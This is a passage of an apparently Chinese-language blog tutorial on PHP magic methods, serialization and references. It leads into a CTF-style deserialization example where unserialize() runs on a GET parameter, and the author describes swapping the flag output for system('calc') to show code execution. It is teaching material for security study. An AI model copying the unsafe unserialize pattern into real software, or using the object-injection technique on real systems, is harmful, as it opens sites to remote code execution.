\/\/\u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u8bfb\u53d6\u6570\u636e\u6216\u8005\u4e0d\u5b58\u5728\u8fd9\u4e2a\u952e\u90fd\u4f1a\u8c03\u7528\u6b64\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"uad1f6f71\">\/\/call\u548cget\u7684\u533a\u522b\u5c31\u662f\uff0ccall\u662f\u8bbf\u95ee\u4e0d\u5b58\u5728\/\u4e0d\u53ef\u8bbf\u95ee\u7684\u51fd\u6570\uff0cget\u662f\u4e0d\u5b58\u5728\/\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027<\/p>\n\n\n\n<pre id=\"Ttgxg\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $var1;\n    public function __get($arg1)\n    {\n        echo  $arg1;\n    }\n}\n$test = new User() ;\n$test -&gt;var2;\n?&gt;\n\n&lt;!-- var2 --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"vRzSl\">__set()<\/h4>\n\n\n\n<p id=\"u25499eee\">__set\u9b54\u672f\u65b9\u6cd5\u662fPHP\u4e2d\u7528\u4e8e\u5904\u7406\u5c5e\u6027\u8bbe\u7f6e\u7684\u4e00\u4e2a\u7279\u6b8a\u65b9\u6cd5\u3002\u5f53\u5c1d\u8bd5\u8bbe\u7f6e\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\u65f6\uff0cPHP\u4f1a\u81ea\u52a8\u8c03\u7528\u8fd9\u4e2a\u65b9\u6cd5\u3002<\/p>\n\n\n\n<pre id=\"xBRn2\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $var1;\n    public function __set($arg1 ,$arg2)\n    {\n        echo  $arg1.','.$arg2;\n    }\n}\n$test = new User() ;\n$test -&gt;var2=1;\n?&gt;\n\n&lt;!-- var2,1 --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"IGwrn\">__isset()<\/h4>\n\n\n\n<p id=\"u8ee4638c\">\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u4f7f\u7528 isset() \u6216 empty() \u65f6\uff0c__isset() \u4f1a\u88ab\u8c03\u7528\u3002\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()\u6216empty()\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"jvhZC\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    private $var;\n    public function __isset($arg1 )\n    {\n        echo  $arg1;\n    }\n}\n$test = new User() ;\nisset($test-&gt;var);\n?&gt;\n\n&lt;!-- var --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"MjVXF\">__unset()<\/h4>\n\n\n\n<p id=\"ucfce0ef0\">\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset()\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"GV0KI\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    private $var;\n    public function __unset($arg1 )\n    {\n        echo  $arg1;\n    }\n}\n$test = new User() ;\nunset($test-&gt;var);\n?&gt;\n\n&lt;!-- var --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"uv1ZV\">__clone()<\/h4>\n\n\n\n<p id=\"ufad846b3\">\u5f53\u4f7f\u7528 clone \u5173\u952e\u5b57\u62f7\u8d1d\u5b8c\u6210\u4e00\u4e2a\u5bf9\u8c61\u540e\uff0c\u65b0\u5bf9\u8c61\u4f1a\u81ea\u52a8\u8c03\u7528\u5b9a\u4e49\u7684\u9b54\u672f\u65b9\u6cd5 __clone()<\/p>\n\n\n\n<pre id=\"Mv8QH\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    private $var;\n    public function __clone( )\n    {\n        echo  \"__clone test\";\n          }\n}\n$test = new User() ;\n$newclass = clone($test)\n?&gt;\n&lt;!-- __clone test --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"BjGtY\"><strong>__autoload()<\/strong><\/h4>\n\n\n\n<p id=\"u46eacb67\">\u5c1d\u8bd5\u52a0\u8f7d\u672a\u5b9a\u4e49\u7684\u7c7b\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"NLFDa\" class=\"wp-block-code\"><code>&lt;?php\n\/\/ \u6ce8\u610f\uff1a__autoload() \u5728 PHP 7.2.0 \u540e\u5df2\u5f03\u7528\nfunction __autoload($className) {\n    echo \"\u5c1d\u8bd5\u81ea\u52a8\u52a0\u8f7d\u7c7b: \" . $className;\n    \/\/ \u8fd9\u91cc\u53ef\u4ee5\u5b9e\u73b0\u7c7b\u6587\u4ef6\u7684\u81ea\u52a8\u52a0\u8f7d\u903b\u8f91\n}\n$test = new NonExistentClass(); \/\/ \u8fd9\u91cc\u89e6\u53d1\n?&gt;\n&lt;!-- \u5c1d\u8bd5\u81ea\u52a8\u52a0\u8f7d\u7c7b: NonExistentClass --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"X70HD\"><strong>__debugInfo()<\/strong><\/h4>\n\n\n\n<p id=\"u586ad714\">\u4f7f\u7528 var_dump() \u6253\u5370\u5bf9\u8c61\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"paWmx\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    private $password = 'secret123';\n    public $username = 'admin';\n    \n    public function __debugInfo() {\n        return &#91;\n            'username' =&gt; $this-&gt;username,\n            'info' =&gt; '\u9690\u85cf\u654f\u611f\u4fe1\u606f\uff0c\u4e0d\u663e\u793apassword'\n        ];\n    }\n}\n$test = new User();\n\/\/ \u8fd9\u91cc\u89e6\u53d1\nvar_dump($test);\n?&gt;\n&lt;!-- object(User)#1 (2) { &#91;\"username\"]=&gt; string(5) \"admin\" &#91;\"info\"]=&gt; string(36) \"\u9690\u85cf\u654f\u611f\u4fe1\u606f\uff0c\u4e0d\u663e\u793apassword\" } --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"PVlWd\"><strong>__set_state()<\/strong><\/h4>\n\n\n\n<p id=\"uee39a845\">\u4f7f\u7528 var_export() \u5bfc\u51fa\u7c7b\u65f6\u89e6\u53d1<\/p>\n\n\n\n<pre id=\"aiA2e\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $username;\n    public $age;\n    \n    public static function __set_state($properties) {\n        $obj = new User();\n        $obj-&gt;username = $properties&#91;'username'];\n        $obj-&gt;age = $properties&#91;'age'] + 1; \/\/ \u53ef\u4ee5\u5728\u8fd9\u91cc\u8fdb\u884c\u4e00\u4e9b\u5904\u7406\n        return $obj;\n    }\n}\n$test = new User();\n$test-&gt;username = 'benben';\n$test-&gt;age = 20;\n\/\/ \u8fd9\u91cc\u89e6\u53d1\neval('$newObj = ' . var_export($test, true) . ';');\nvar_dump($newObj);\n?&gt;\n&lt;!-- object(User)#2 (2) { &#91;\"username\"]=&gt; string(6) \"benben\" &#91;\"age\"]=&gt; int(21) } --&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"QNNzO\"><strong>__serialize() \u548c __unserialize()<\/strong><\/h4>\n\n\n\n<p id=\"udb3dd839\">PHP 7.4 \u65b0\u589e\u7684\u5e8f\u5217\u5316\u65b9\u6cd5<\/p>\n\n\n\n<pre id=\"WDFlA\" class=\"wp-block-code\"><code>&lt;?php\nclass User {\n    public $username;\n    private $password;\n    \n    public function __construct($username, $password) {\n        $this-&gt;username = $username;\n        $this-&gt;password = $password;\n    }\n    \n    \/\/ PHP 7.4+ \u65b0\u589e\uff0c\u4f18\u5148\u7ea7\u9ad8\u4e8e __sleep()\n    public function __serialize(): array {\n        return &#91;\n            'user' =&gt; $this-&gt;username,\n            'pass_hash' =&gt; md5($this-&gt;password) \n        ];\n    }\n    \n    public function __unserialize(array $data): void {\n        $this-&gt;username = $data&#91;'user'];\n        $this-&gt;password = 'restored'; \/\/ \u53cd\u5e8f\u5217\u5316\u65f6\u7684\u521d\u59cb\u5316\n    }\n}\n$test = new User('admin', '123456');\n$ser = serialize($test); \/\/ \u8fd9\u91cc\u89e6\u53d1 __serialize()\n$new = unserialize($ser); \/\/ \u8fd9\u91cc\u89e6\u53d1 __unserialize()\nvar_dump($ser);\n?&gt;\n&lt;!-- string(81) \"O:4:\"User\":2:{s:4:\"user\";s:5:\"admin\";s:9:\"pass_hash\";s:32:\"e10adc3949ba59abbe56e057f20f883e\";}\" --&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ohZpM\">PHP \u533f\u540d\u7c7b<\/h3>\n\n\n\n<pre id=\"BP80d\" class=\"wp-block-code\"><code>&lt;?php\n$a = new class {\n    function getflag()\n    {\n        system('cat \/flag.txt');\n    }\n};\n\necho get_class($a);\n\/\/class@anonymous+%00+php\u6587\u4ef6\u8def\u5f84+:\u884c\u6570$\u5217\u6570    \/\/linux\n\/\/class@anonymous+%00+php\u6587\u4ef6\u8def\u5f84+\u5185\u5b58\u5730\u5740  \/\/windows<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"XBmlQ\">PHP \u52a8\u6001\u5c5e\u6027<\/h3>\n\n\n\n<p id=\"u3d4d54cb\">\u52a8\u6001\u5c5e\u6027\u662f\u6307\u5728\u5bf9\u8c61\u5b9e\u4f8b\u5316\u540e\uff0c\u76f4\u63a5\u8d4b\u503c\u7ed9<strong>\u7c7b\u5b9a\u4e49\u4e2d\u4e0d\u5b58\u5728<\/strong>\u7684\u5c5e\u6027\u3002\u8fd9\u662f PHP \u7075\u6d3b\u6027\u7684\u4e00\u5927\u4f53\u73b0\uff0c\u4e5f\u662f\u53cd\u5e8f\u5217\u5316\u5229\u7528\u7684\u6838\u5fc3\u3002<\/p>\n\n\n\n<p id=\"ueb79590d\">\u5728 PHP \u5185\u90e8\uff0c\u5bf9\u8c61\u7684\u5c5e\u6027\u5b58\u50a8\u5728\u4e00\u4e2a HashTable \u4e2d\u3002\u5982\u679c\u662f\u7c7b\u5b9a\u4e49\u7684\u5c5e\u6027\uff0c\u5b83\u4eec\u6709\u56fa\u5b9a\u7684 offset\uff1b\u5982\u679c\u662f\u52a8\u6001\u5c5e\u6027\uff0c\u5219\u4f1a\u8ffd\u52a0\u5230\u8fd9\u4e2a HashTable \u4e2d\u3002 \u4ece PHP 8.2 \u5f00\u59cb\uff0c\u52a8\u6001\u5c5e\u6027\u88ab\u5e9f\u5f03\uff08Deprecated\uff09\uff0c\u9664\u975e\u7c7b\u4f7f\u7528\u4e86 #[AllowDynamicProperties] \u6ce8\u89e3\u6216\u7ee7\u627f\u81ea stdClass\u3002\u4f46\u5728 PHP 5.x &#8211; 8.1 \u4e2d\uff0c\u8fd9\u662f\u9ed8\u8ba4\u5141\u8bb8\u7684\u3002<\/p>\n\n\n\n<pre id=\"JtZye\" class=\"wp-block-code\"><code>class Phantom {}\n$obj = new Phantom();\n$obj-&gt;newProp = \"Hacker\"; \/\/ \u52a8\u6001\u521b\u5efa\u5c5e\u6027\n\/\/ \u5e8f\u5217\u5316\u540e\uff1aO:7:\"Phantom\":1:{s:7:\"newProp\";s:6:\"Hacker\";}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ZfWnN\">php\u5f15\u7528<\/h3>\n\n\n\n<p id=\"u6a3a8a5e\">\u5728 PHP \u4e2d\uff0c\u5f15\u7528\u610f\u5473\u7740\u4e24\u4e2a\u4e0d\u540c\u7684\u53d8\u91cf\u540d\u8bbf\u95ee\u540c\u4e00\u4e2a\u53d8\u91cf\u5185\u5bb9<\/p>\n\n\n\n<p id=\"ucad2cd90\"><strong>\u7b26\u53f7<\/strong>\uff1a<code>&amp;<\/code><\/p>\n\n\n\n<p id=\"u1f517bbb\">\u4e00\u65e6\u5efa\u7acb\u5f15\u7528\uff0c\u6539\u53d8\u5176\u4e2d\u4e00\u4e2a\u53d8\u91cf\u7684\u503c\uff0c\u53e6\u4e00\u4e2a\u53d8\u91cf\u7684\u503c\u4e5f\u4f1a<strong>\u7acb\u5373<\/strong>\u6539\u53d8\u3002<\/p>\n\n\n\n<p id=\"u13e60798\"><strong>\u5185\u5b58\u5171\u4eab<\/strong>\uff1a\u5b83\u4eec\u6307\u5411\u540c\u4e00\u4e2a Zval (Zend Value) \u7ed3\u6784\u3002<\/p>\n\n\n\n<pre id=\"o3cZa\" class=\"wp-block-code\"><code>&lt;?php\nclass Phantom {\n    public $A;\n    public $B;\n}\n\n$obj = new Phantom();\n$obj-&gt;A = \"secret\";\n\n\/\/ \u3010\u5173\u952e\u6b65\u9aa4\u3011\u5c06 B \u8bbe\u7f6e\u4e3a A \u7684\u5f15\u7528\n$obj-&gt;B = &amp;$obj-&gt;A; \n\necho serialize($obj);\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38-1024x587.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" data-attachment-id=\"68\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=68\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38.png\" data-orig-size=\"1153,661\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38-300x172.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38-1024x587.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-38-1024x587.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-68\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u8f35355a\">s:1:&#8221;A&#8221;;s:6:&#8221;secret&#8221;;\uff1a\u5c5e\u6027 A \u88ab\u6b63\u5e38\u5e8f\u5217\u5316\u3002<\/p>\n\n\n\n<p id=\"ufe25dafa\">s:1:&#8221;B&#8221;;R:2;\uff1a\u5c5e\u6027 B \u6ca1\u6709\u518d\u6b21\u5b58\u50a8 &#8220;secret&#8221;\uff0c\u800c\u662f\u6307\u5411\u4e86\u7b2c 2 \u4e2a\u53cd\u5e8f\u5217\u5316\u7684\u503c\uff08\u8fd9\u91cc\u6307\u7684\u5c31\u662f\u5c5e\u6027 A \u7684\u503c\uff09\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"IWx12\">php\u53cd\u5e8f\u5217\u5316<\/h3>\n\n\n\n<p id=\"ud72bc58d\">\u5728php\u4e2d\uff0c\u5c06\u6570\u636e\u8fdb\u884c\u5e8f\u5217\u5316\u7684\u51fd\u6570serialize \u8fd9\u662f\u4e00\u79cd\u5b58\u50a8\u6570\u636e\u7684\u65b9\u6cd5\uff0c\u5c06\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u53cd\u5e8f\u5217\u5316\u7684\u51fd\u6570\u662funserialize<\/p>\n\n\n\n<p id=\"u637b6c5b\">\u5728 PHP 7.4 \u65b0\u589e\u7684\u4e86__serialize() \u548c __unserialize()\u9b54\u672f\u65b9\u6cd5<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39-1024x539.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"539\" data-attachment-id=\"69\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=69\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39.png\" data-orig-size=\"1919,1011\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39-300x158.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39-1024x539.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-39-1024x539.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-69\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u34525638\">\u5728\u524d\u9762\u5df2\u7ecf\u4ecb\u7ecd\u8fc7\u5e8f\u5217\u5316\u4e86<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"H0Q3g\">\u4f8b\u98981<\/h4>\n\n\n\n<p id=\"u890b6b1e\">\u8fd9\u91cc\u6765\u770b\u4e00\u9053\u4f8b\u9898<\/p>\n\n\n\n<pre id=\"tK2wZ\" class=\"wp-block-code\"><code>&lt;?php\nclass NSS {\n    var $name;\n\n    function __destruct() {\n        if ($this-&gt;name === 'ctf') {\n            echo getenv('FLAG');\n        }\n    }\n}\n\nunserialize($_GET&#91;'n']);<\/code><\/pre>\n\n\n\n<p id=\"u70e84803\">\u5982\u679c$this-&gt;name === &#8216;ctf&#8217; \u90a3\u4e48\u5c31\u8f93\u51faenv\u4e2d\u7684flag<\/p>\n\n\n\n<p id=\"u3105ef28\">\u8fd8\u8bb0\u5f97__destruct\u7684\u89e6\u53d1\u65b9\u6cd5\u5417\uff0c\u6ca1\u9519\u662f\u5728\u5bf9\u8c61\u9500\u6bc1\u7684\u65f6\u5019<\/p>\n\n\n\n<p id=\"uac4b1099\">\u90a3\u4e48\u4ec0\u4e48\u65f6\u5019\u4f1a\u9500\u6bc1\u5bf9\u8c61\u5462\uff0c\u5c31\u662f\u5728\u7528\u5b8c\u4e4b\u540e\uff0c\u4e5f\u5c31\u662f\u53cd\u5e8f\u5217\u5316 unserialize\u4e4b\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"794\" height=\"441\" data-attachment-id=\"70\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=70\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40.png\" data-orig-size=\"794,441\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40-300x167.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-40.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-70\"  sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue6223400\">\u6211\u4eec\u53ef\u4ee5\u5728\u672c\u5730\u8c03\u8bd5\u4e00\u4e0b<\/p>\n\n\n\n<p id=\"u5d892b75\">\u9996\u5148\u8ba9\u4ed6\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6name=ctf<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"291\" height=\"80\" data-attachment-id=\"71\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=71\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png\" data-orig-size=\"291,80\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-41.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-71\"\/><\/div><\/figure>\n\n\n\n<p id=\"u73422267\">\u7136\u540e\u901a\u8fc7serialize\u8f93\u51faNSS\u8fd9\u4e2a\u7c7b\u5e8f\u5217\u5316\u540e\u7684\u5b57\u7b26\u4e32<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"650\" data-attachment-id=\"72\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=72\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42.png\" data-orig-size=\"834,650\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42-300x234.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-42.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-72\"  sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1478aafa\">\u5c06\u8fd9\u4e2a\u503c\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\uff0c\u4e3a\u4e86\u5728\u672c\u5730\u76f4\u89c2\u4e00\u4e9b\uff0c\u6211\u5c06echo getenv(&#8216;FLAG&#8217;);\u6539\u6210system(&#8220;calc&#8221;);<\/p>\n\n\n\n<p id=\"u8c5e44ff\">\u8fdc\u7a0b\u6253\u8fc7\u53bb\u662f\u4e00\u6837\u7684\u6548\u679c\uff0c\u56e0\u4e3a\u90fd\u662f\u89e6\u53d1__destruct\u8fd9\u4e2a\u9b54\u672f\u65b9\u6cd5\uff0c\u6267\u884c\u91cc\u9762\u7684\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43-1024x751.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"751\" data-attachment-id=\"73\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=73\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43.png\" data-orig-size=\"1179,865\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" 